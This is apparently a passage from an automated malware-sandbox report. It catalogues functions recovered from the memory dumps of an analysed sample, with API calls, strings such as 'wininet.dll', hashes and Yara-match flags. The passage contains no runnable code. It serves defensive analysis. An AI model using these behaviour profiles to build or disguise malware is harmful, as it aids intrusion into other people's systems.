                                                • Instruction ID: 274b2c4f473c8bb0f4fc575c9687cc998818a1e98fdaea12bb9e3dc15d43cccb
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: A9D012762003146BD714EB98CC45E97776DEF44750F154455BA185B241C530F50086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 674d7cb77f877fd858ed819db3542a3debcb856cfad6be92234d86d0d13a6fec
                                                • Instruction ID: 39ca991a47f3cb1f87c9c5912ee00adcea9d4e3390ee8625a570c9b857591eba
                                                • Opcode Fuzzy Hash: 674d7cb77f877fd858ed819db3542a3debcb856cfad6be92234d86d0d13a6fec
                                                • Instruction Fuzzy Hash: 48900261252041527545B15944045074046A7E0687B91C512A2409A60C8566E86BE6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d0731794a04b943ddc8bcc60da52dd7ad1b27ab53ba1a661dc50ef3d701cdfbd
                                                • Instruction ID: abdad2cb602a82763440d39b5bda2e33fceec91dd64f31670f732717e327ad78
                                                • Opcode Fuzzy Hash: d0731794a04b943ddc8bcc60da52dd7ad1b27ab53ba1a661dc50ef3d701cdfbd
                                                • Instruction Fuzzy Hash: 8990027121100413F11161594504707004997D0687F91C912A1419668D9696D967B1A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 048299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f729dd062192ee2bedc51a438289c3648fd16adf56dfe9b1309aa829e9062044
                                                • Instruction ID: 403509df7cd0cae57d5f6e6d14c9cc9dd80b95f998a2428911558087f3d06ece
                                                • Opcode Fuzzy Hash: f729dd062192ee2bedc51a438289c3648fd16adf56dfe9b1309aa829e9062044
                                                • Instruction Fuzzy Hash: 569002A135100442F10061594414B060045D7E1747F51C515E2059664D8659DC6771A6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 048295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4cf774a2ba0356ddf5da7f7a32080cf47fa75de7f747aacdeef2a3d927a30f6f
                                                • Instruction ID: de6c2dc0619227243fbaa282cff0cd2f772fdaeff915635e2047c7cba4959041
                                                • Opcode Fuzzy Hash: 4cf774a2ba0356ddf5da7f7a32080cf47fa75de7f747aacdeef2a3d927a30f6f
                                                • Instruction Fuzzy Hash: 1C9002A121200003610571594414616404A97E0647F51C521E20096A0DC565D8A671A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ed1f65c2f533ceb2707bafac516201df5780ea4bbdd768374b0c217439778dee
                                                • Instruction ID: 21a2c8b8c4330df44d035d95b24c9e6a9816c377174dba053e2fdddee42927da
                                                • Opcode Fuzzy Hash: ed1f65c2f533ceb2707bafac516201df5780ea4bbdd768374b0c217439778dee
                                                • Instruction Fuzzy Hash: 4B9002B121100402F14071594404746004597D0747F51C511A6059664E8699DDEA76E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 676af8859365413eb9f68c0808e0e2df71abd98fd5a2c0656dc97d99aacdbfb4
                                                • Instruction ID: 9cd88d2ca6b1d780914522ba1393e418bffc66f4d7496e9daf078744f38c4691
                                                • Opcode Fuzzy Hash: 676af8859365413eb9f68c0808e0e2df71abd98fd5a2c0656dc97d99aacdbfb4
                                                • Instruction Fuzzy Hash: 0B900265221000032105A5590704507008697D5797751C521F200A660CD661D87661A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 048296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1572a71abd0065da22e783debb76a5866c566547b942aefd7a97ab4bc4a17561
                                                • Instruction ID: f0f439619da5147b68b4544b58802612e23324f3bf91151804c174afe3286fa5
                                                • Opcode Fuzzy Hash: 1572a71abd0065da22e783debb76a5866c566547b942aefd7a97ab4bc4a17561
                                                • Instruction Fuzzy Hash: F190027121100842F10061594404B46004597E0747F51C516A1119764D8655D86675A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 048296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: dac758f89581ae37a70ef18188104d86122d0bcb5fc45d7ccd509a43f4dcebd4
                                                • Instruction ID: eb21212cc32605813a48e6b9f24b6b5f9ead15c60fc65a6201dbddf4219065b8
                                                • Opcode Fuzzy Hash: dac758f89581ae37a70ef18188104d86122d0bcb5fc45d7ccd509a43f4dcebd4
                                                • Instruction Fuzzy Hash: F090027121108802F1106159840474A004597D0747F55C911A5419768D86D5D8A671A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 05557e631bbeeb7daa4d3b6f675e6a9c8dbd3ca1af10caa7fb37842ce5a96059
                                                • Instruction ID: 444e85bc24b199447604a1414f9dd79524088b11b36fda9eac7ee482c83d4614
                                                • Opcode Fuzzy Hash: 05557e631bbeeb7daa4d3b6f675e6a9c8dbd3ca1af10caa7fb37842ce5a96059
                                                • Instruction Fuzzy Hash: 5F90027121504842F14071594404A46005597D074BF51C511A10597A4D9665DD6AB6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c4ad21df81fbb56089db66f4fa5363683b249d8604c3febbf0f8001185b767ff
                                                • Instruction ID: d8d8aa2c6bb54b3521914fa80cfda33629f706f8cebed3ef574f501020a4aa9a
                                                • Opcode Fuzzy Hash: c4ad21df81fbb56089db66f4fa5363683b249d8604c3febbf0f8001185b767ff
                                                • Instruction Fuzzy Hash: AB90026122180042F20065694C14B07004597D0747F51C615A1149664CC955D87665A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9a486db4999439403971c0f0efcd46c45d7bae4816044e4e130c87e5d9e3c499
                                                • Instruction ID: 548e3a6adbe4084ee0c2f2606fe5ab3f20690ae6eee29720411503f688339855
                                                • Opcode Fuzzy Hash: 9a486db4999439403971c0f0efcd46c45d7bae4816044e4e130c87e5d9e3c499
                                                • Instruction Fuzzy Hash: 2090027121100802F1807159440464A004597D1747F91C515A101A764DCA55DA6E77E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a55a70f3c3236feb9a2981c4e0d4d96a0a030f52bff8b77d49907fb7b63deaaf
                                                • Instruction ID: e2332e672b3d5550a6fd2224d7adc427bfdf2a91c81f73ad1f30c02ee52cc5c6
                                                • Opcode Fuzzy Hash: a55a70f3c3236feb9a2981c4e0d4d96a0a030f52bff8b77d49907fb7b63deaaf
                                                • Instruction Fuzzy Hash: CA90026922300002F1807159540860A004597D1647F91D915A100A668CC955D87E63A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b1b451d07062491bdddb1dc424db1c019b13bc70d4bd3e35d466fc244fbc217a
                                                • Instruction ID: a5fe5e75bd27bb026fc3e5215fa09d70aed1e7a690d694496038cfec478ef90b
                                                • Opcode Fuzzy Hash: b1b451d07062491bdddb1dc424db1c019b13bc70d4bd3e35d466fc244fbc217a
                                                • Instruction Fuzzy Hash: 9790027132114402F11061598404706004597D1647F51C911A1819668D86D5D8A671A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04829710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d6207817e8eee55953fe5c4c30bab137724676414858de85df68424b5f1939dc
                                                • Instruction ID: 3f2617ac2143ec0c0ec89aad37c7b739488fb118e129ba8415efb3a301b57921
                                                • Opcode Fuzzy Hash: d6207817e8eee55953fe5c4c30bab137724676414858de85df68424b5f1939dc
                                                • Instruction Fuzzy Hash: EA90027121100402F10065995408646004597E0747F51D511A6019665EC6A5D8A671B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA662, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(029A4536,?,029A4CAF,029A4CAF,?,029A4536,?,?,?,?,?,00000000,00000000,?), ref: 029AA65D
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02993AF8), ref: 029AA69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateFree
                                                • String ID: .z`
                                                • API String ID: 2488874121-1441809116
                                                • Opcode ID: ad421af4e99ebc2be5f242f78b2c5f26f0edf7575d86e5149ce878750299a963
                                                • Instruction ID: 314bf96a8e5c5cff0edb586d1aca6cab8ca6d7f3b6e4db78f58229e14e4ca75c
                                                • Opcode Fuzzy Hash: ad421af4e99ebc2be5f242f78b2c5f26f0edf7575d86e5149ce878750299a963
                                                • Instruction Fuzzy Hash: 6CF06DB62002456FCB14EFA8DC50CEB3769EFC4224B108566FC1893201C630D915CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029A9080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 029A9128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 0fdc58a123b94ef49e460aea890e5665add696cba25f5809d50b3b88e2771d27
                                                • Instruction ID: 1a530f157b7354e5682458981518063c53765cfc3d670f2127d35c1bbb8375cf
                                                • Opcode Fuzzy Hash: 0fdc58a123b94ef49e460aea890e5665add696cba25f5809d50b3b88e2771d27
                                                • Instruction Fuzzy Hash: 6C318FB2900344BBD724DF64C899F67B7B9FB88B04F10851DF62A5B245D730A650CBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029A907B, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 029A9128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 330067cffcbf991e901a53140b38abbc752edc2cbab0a0b4c06dfc7e03383d5f
                                                • Instruction ID: bc6a3fa168af275f37aa5b2d49af751a0ac1c368d0cf55ae2e0146b964900b7d
                                                • Opcode Fuzzy Hash: 330067cffcbf991e901a53140b38abbc752edc2cbab0a0b4c06dfc7e03383d5f
                                                • Instruction Fuzzy Hash: 772180B1900345BBDB24DF64C899B6BB7B9FF88B04F10802DE6295B245D774A550CFE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02993AF8), ref: 029AA69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 9a0b13a7cc871cdd62f25ae249c4e43a5080ebaa83466be5c3844dbf2ebe213d
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 2AE012B2200208ABDB18EF99CC48EA777ADEF88750F118558BA085B241C630E910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02998310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0299836A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0299838B
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                • Instruction ID: 823dba92e968b0f521dc35b63f5d2dc3566649fa4bce2220d9a834f647f545f3
                                                • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                • Instruction Fuzzy Hash: 5201A731A8032877EB20A6989C42FBE776DAB41F60F140119FF04BA1C1E7D4690646F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029982D3, Relevance: 3.0, APIs: 2, Instructions: 49threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0299836A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0299838B
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: e98f966c844b25eefd9331ff641f85ca7453b10ca577d6062e8a67f2ce4d1c3e
                                                • Instruction ID: f2439beff2f8afb3a41e7158ca87fc7ec93d79f06cad31427a998f5f70ea4e85
                                                • Opcode Fuzzy Hash: e98f966c844b25eefd9331ff641f85ca7453b10ca577d6062e8a67f2ce4d1c3e
                                                • Instruction Fuzzy Hash: 80F02B3278022822FB10666C7C43BFE7358ABC1B35F18057EFE08DA2C0E695541646E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA806, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0299F1D2,0299F1D2,?,00000000,?,?), ref: 029AA800
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 59038c7d32ce65c40d57320a0b5606bbf90ac01ce18e101a5f9beaf6b4b58d3e
                                                • Instruction ID: f3c9a5c5e89c7d3332306ce601a4a098e95723beab882944c3f776b64428c73e
                                                • Opcode Fuzzy Hash: 59038c7d32ce65c40d57320a0b5606bbf90ac01ce18e101a5f9beaf6b4b58d3e
                                                • Instruction Fuzzy Hash: 3B11ACB26043086FD714EF98DC94EE777A9EF85614F1484A6F90C9B342D631EA11CBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0299ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0299AD62
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction ID: 41a020b1f7979b29d68d0b55769eb9c327a8646c578091ae1cde6f19f6921d48
                                                • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction Fuzzy Hash: 3F011EB5D4020DBBDF10EAA4DC51FDDB7B99F54318F004595A90897240FA31EB54CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029AA734
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 86de5f1683cffaa751a7fe8f0b5df25270e87339d602de5e526973cae6ec59e2
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: C301B2B2210208BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029A91B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0299F050,?,?,00000000), ref: 029A91EC
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: d001787dd8ca96fa65b2911aefc285a5cdad22473a2ac9871353164a03a2e4aa
                                                • Instruction ID: 62ffae361aeaa3834013f5d96d7fbb976f7846d4305a2c805db16d3e97b20284
                                                • Opcode Fuzzy Hash: d001787dd8ca96fa65b2911aefc285a5cdad22473a2ac9871353164a03a2e4aa
                                                • Instruction Fuzzy Hash: DDE092373803043AE3306599AC02FA7B39CDBC1B30F140026FA0DEB2C0D996F40146E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029A91B2, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0299F050,?,?,00000000), ref: 029A91EC
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 38c6dc03e29f3650186a4f500d581285e1748c22d89d0a41b03e691686eb6f2f
                                                • Instruction ID: 789908ab53d84e27e17b04f42c7d7084f85767f3deff6fc9de64b95a20d07a0c
                                                • Opcode Fuzzy Hash: 38c6dc03e29f3650186a4f500d581285e1748c22d89d0a41b03e691686eb6f2f
                                                • Instruction Fuzzy Hash: 6FE04F763803003AE23065589C12FA7629D9BD1B20F250129FA49AB2C0DA96B80146E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA630, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(029A4536,?,029A4CAF,029A4CAF,?,029A4536,?,?,?,?,?,00000000,00000000,?), ref: 029AA65D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 53a09253fe045a96b1157cd8b451ac9a9c472785d06cb1a5d772b787002037e6
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: 73E012B2200208ABDB18EF99CC40EA777ADEF88654F118558BA085B241C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0299F1D2,0299F1D2,?,00000000,?,?), ref: 029AA800
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 8028f80ad665a882b3f5ed33b18bd75b96133ac861e2fcf367bef7063256c2f6
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 89E01AB12002086BDB14DF49CC84EE737ADEF88650F118164BA0857241C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0299F6C8, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02998D14,?), ref: 0299F6FB
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 41b7f5a14921240d1834d9ea541185d192e3a4f8be0c94967e3b19a0b0963967
                                                • Instruction ID: b2599c547498d109ace620d55ff1756019b45adc515deb31b6145f85fc534069
                                                • Opcode Fuzzy Hash: 41b7f5a14921240d1834d9ea541185d192e3a4f8be0c94967e3b19a0b0963967
